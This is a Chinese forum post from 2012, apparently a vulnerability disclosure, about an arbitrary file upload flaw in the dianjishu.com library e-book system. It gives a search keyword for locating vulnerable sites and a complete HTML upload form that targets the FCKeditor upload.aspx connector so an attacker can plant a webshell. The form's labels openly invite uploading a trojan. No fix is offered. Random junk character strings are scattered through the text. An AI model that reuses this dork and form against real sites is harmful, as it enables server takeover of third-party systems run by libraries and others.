主题:图书馆系统任意文件上传漏洞2 a7 b. H0 e7 t% |! \. J
作者:冰锋刺客5 O- q. ^. W1 h
厂商:点击书(dianjishu.com)- Z2 }4 e/ Y$ m1 h1 q) b; m
日期:2012-6-21
3 @; P& K P f! s5 X& |
; y* z6 x, _$ k" YI 概述
: u. y; M+ M% k 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell0 b% i6 \4 ^% p
II 简介: J ~, ~$ `' S5 I9 h* I4 `
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"- h/ S i4 g1 B$ E" I
补充一个漏洞
9 ]: @4 s8 ]4 X. a8 U <form id="frmUpload" enctype="multipart/form-data"
6 K1 R5 Q, i" d- S5 _; P2 B action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>6 |% U: d: d2 v# r4 U
<input id="btnUpload" type="submit" value="操翻他">
9 P$ U: h6 o# ~: [; z- j6 } </form>% j6 _* J$ j n+ k4 C. ~2 v6 }
你们懂的
& ^- H' v: n9 v7 W; k, _/ Z/ o 那傻逼提供还需要改包.7 @: A& g: ]" e" E3 C
自己看了下源代码发现fckeditor5 O* ]& L8 t7 H5 k6 w0 K x
直接秒杀
Y5 ^# d" y. z& m |
发表于 2012-9-10 21:20:59
收藏
支持
反对